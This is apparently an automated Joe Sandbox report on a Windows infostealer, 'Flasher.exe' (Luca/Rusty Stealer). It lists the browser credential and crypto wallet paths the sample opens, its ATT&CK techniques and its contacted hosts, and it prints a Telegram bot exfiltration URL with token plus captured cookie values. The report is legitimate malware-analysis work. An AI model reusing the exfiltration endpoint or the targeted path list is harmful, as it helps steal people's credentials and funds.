Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\NetworkDataMigrated\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\	Jump to behavior

Remote Access Functionality

Yara detected Luca Stealer

Source: Yara match	File source: Flasher.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Flasher.exe.7ff6d34f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Flasher.exe.7ff6d34f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Flasher.exe PID: 7284, type: MEMORYSTR

Yara detected Rusty Stealer

Source: Yara match

File source: Process Memory Space: Flasher.exe PID: 7284, type: MEMORYSTR

Source: C:\Users\user\Desktop\Flasher.exe

Code function: 0_2_00007FF6D35D4818 bind,GetLastError,

0_2_00007FF6D35D4818

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	3 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	25 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Flasher.exe	100%	Avira	HEUR/AGEN.1363266
Flasher.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://cdn.ipwhois.io/flags/us.svg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipwho.is	108.181.61.49	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMO	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	false		high
https://duckduckgo.com/chrome_newtab	Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	false		high
https://duckduckgo.com/ac/?q=	Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	false		high
https://api.telegram.org/bot/sendDocument?chat_id=&caption=&parse_mode=HTML0	Flasher.exe	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	false		high
https://docs.rs/getrandom#nodejs-es-module-support	Flasher.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	false		high
https://api.telegram.org/bot7812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMOA/sendDocument?chat_id=-466	Flasher.exe, 00000000.00000003.1760743375.000001EE77951000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1760408069.000001EE778EC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendDocument?chat_id=&caption=&parse_mode=HTML	Flasher.exe	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	false		high
https://www.ecosia.org/newtab/	Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	false		high
https://cdn.ipwhois.io/flags/us.svg	Flasher.exe, 00000000.00000003.1760408069.000001EE77891000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000002.1761203830.000001EE77891000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
108.181.61.49	ipwho.is	Canada		852	ASN852CA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581484
Start date and time:	2024-12-27 21:47:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Flasher.exe
Detection:	MAL
Classification:	mal100.troj.spyw.winEXE@4/51@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 69% Number of executed functions: 100 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded IPs from analysis (whitelisted): 52.149.20.212, 104.208.16.94
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Flasher.exe

Simulations

Behavior and APIs

Time	Type	Description
15:48:04	API Interceptor	5x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	tg.exe	Get hash	malicious	Babadeda	Browse
	tg.exe	Get hash	malicious	Babadeda	Browse
	setup.exe	Get hash	malicious	Babadeda	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
108.181.61.49	888.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	888.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	Cracker.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	tg.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	tg.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	setup.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	149.154.167.220
	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	149.154.167.220
ipwho.is	msgde.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	6ee7HCp9cD.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	wUSt04rfJ0.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	https://en.newsnowbangla.com/archives/69912	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	108.181.61.49
	StGx54oFh6.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	1AqzGcCKey.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	BJtvb5Vdhh.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	HquJT7q6xG.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	hKvlV6A1Rl.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	kqeGVKtpy2.exe	Get hash	malicious	Quasar	Browse	108.181.61.49

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://linkenbio.net/59125/247	Get hash	malicious	Unknown	Browse	149.154.167.99
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	installer.bat	Get hash	malicious	Vidar	Browse	149.154.167.99
	skript.bat	Get hash	malicious	Vidar	Browse	149.154.167.99
	din.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	yoda.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	lem.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	script.ps1	Get hash	malicious	Vidar	Browse	149.154.167.99
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse	149.154.167.220
ASN852CA	msgde.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	6ee7HCp9cD.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	telnet.sh4.elf	Get hash	malicious	Unknown	Browse	75.155.196.115
	armv6l.elf	Get hash	malicious	Unknown	Browse	205.250.152.203
	wUSt04rfJ0.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	armv7l.elf	Get hash	malicious	Unknown	Browse	75.155.145.0
	jklspc.elf	Get hash	malicious	Unknown	Browse	50.99.243.16
	splsh4.elf	Get hash	malicious	Unknown	Browse	207.34.140.144
	splmips.elf	Get hash	malicious	Unknown	Browse	142.241.147.185
	splx86.elf	Get hash	malicious	Unknown	Browse	199.126.48.47

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	108.181.61.49 149.154.167.220
	TCKxnQ5CPn.exe	Get hash	malicious	Unknown	Browse	108.181.61.49 149.154.167.220
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	108.181.61.49 149.154.167.220
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	108.181.61.49 149.154.167.220
	A4FY1OA97K.lnk	Get hash	malicious	DanaBot	Browse	108.181.61.49 149.154.167.220
	vreFmptfUu.lnk	Get hash	malicious	DanaBot	Browse	108.181.61.49 149.154.167.220
	skript.bat	Get hash	malicious	Vidar	Browse	108.181.61.49 149.154.167.220
	msgde.exe	Get hash	malicious	Quasar	Browse	108.181.61.49 149.154.167.220
	6ee7HCp9cD.exe	Get hash	malicious	Quasar	Browse	108.181.61.49 149.154.167.220

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllullkv/tz:NllU+v/
MD5:	6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:	5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:	36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:	F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\cookies_google_default.txt

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	ASCII text, with very long lines (523)
Category:	dropped
Size (bytes):	3320
Entropy (8bit):	5.841496511363167
Encrypted:	false
SSDEEP:	96:PJfpoO2jFcRhFZyJKhZLzmv3u2FSEe135sSCwPB2cvsmC:RQmRtugaU0
MD5:	474F8569A0995EBC308E6F09274D4AE9
SHA1:	315FCF510C6E2DC6C1986605D4E87ABF7936623B
SHA-256:	9919AE4602285BB1FE77719ADAF98E7222EB53B927E367EC6E0C9C3F1DBA164C
SHA-512:	EF667DEDBBBBE118304A6FF3E3A4451B9B955A66BB96479C724602BE4CBC4B09915FE5C3F3FBB2560986EBDE0DEC2F03D5344A569C19092A7F461597B66E7193
Malicious:	false
Reputation:	low
Preview:	.google.com.false./.TRUE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk.support.microsoft.com.true./.TRUE.13340887435186329..AspNetCore.AuthProvider.True.support.microsoft.com.true./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N.support.microsoft.com.true./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N.support.office.com.true./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474..microsoft.com.false./.TRUE.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f399&H

C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\screen1.png

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	913744
Entropy (8bit):	7.961431630931833
Encrypted:	false
SSDEEP:	12288:yohDfNc/PGaqTyzKX5o/i46oWb85BD4ojs4Wj9CJYT7RlXsVlf/RVF53NLMJkqS:yoJC/PRgyzi5oK85F4ojbWRSYT72d6TS
MD5:	002A0EAF9966C670C35396A48686B0BC
SHA1:	9E5A5FC409EFDC48703EE92F2ACC14EB4901C5EB
SHA-256:	62082605D85EB82F8FED3DA45E2B5CE478928100F896BD21D35CDE40680A5996
SHA-512:	2E1461B5D586069D9D7B55DFDE4C0B2C0C01114E0ABBC801AD91E317B3FF59E9DFE72E8D8CC06E0A5FF97B2CC11C0A9D881F2A1FFAFBC13B09DF97DF952B7A31
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................C....IDATx...y.u}Z.....y..}...`.(T9..D....h......:}%.2......t.s]..D@...(...A..AD./p.j'. .(TQ.;<......{.....}...xW.{....~.5.~........x...@.Ce.XM\|.^.....].1...e5...i~.F..l.z>.s.7.y......c.......N.lkz..]Js.E.k...5....k..80........9.4.~.S......[.X....c....4mH.Fy .....}.i..../..#.:p...m...:w.t8.....1.....)f_.>.#n..:.X....b.}^.S.;......M..\|L...m.....n..aO....w.i...>......qh~:...w. .R....].6..o....M%..'........9.1..H....'}.+.Pc...........Z-.;.Z.y..\|.9.Gg.a^m.1J...a...)VR.../.c..I...._..._m..e...E.:.?.U... .y.fJ.hz..I.z....}.\.{.aW......W...5/.9;;...:..kWY..(.io..\.s.....Z.:.$ ..\...A...I.../.{5..y.\u..'......0m.Q?r.&..F.......qT....!.a...v...8...{{..]..<.q....[.=Y..e.>.....q.[..#N.O..g.IYR..1..ue.9.^z).s@.}{.$..CY.:`h.g..e).3.F..o.\...}sV.x1....U.......,S.q0rhh...........W....Q.#w....e)...5..w..=zTy_\|...c..c~.._>.P.....d.&{...:.... <v.....<b..6I\.[..#..~.......x.c.eP.~mS>...+...6En@.ri/%w0.).

C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\sensfiles.zip

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	20386
Entropy (8bit):	5.0102132434779785
Encrypted:	false
SSDEEP:	384:uOl9tybTPHTPYvZR1lDOl9tybTPHTPYvZR1lQC:ugtyCPgtyCMC
MD5:	767176BA0DB3433DBEF1E4E57512D010
SHA1:	21EB8C247D83B8EAE9EBAAC46D977822882FBFA8
SHA-256:	B5708ACA155E0B7504B33EFFF5B165129DA1A7B56E3D1B5C9A7856EF875A0504
SHA-512:	D344E3FC13628A0E23489AF8C93A21CE377EEC2497A9379ED2510E4266AEE0745D95A560BDCDAD39C1ABF50C050790FB487D6A899C0131D89F49D9891D23880C
Malicious:	false
Reputation:	low
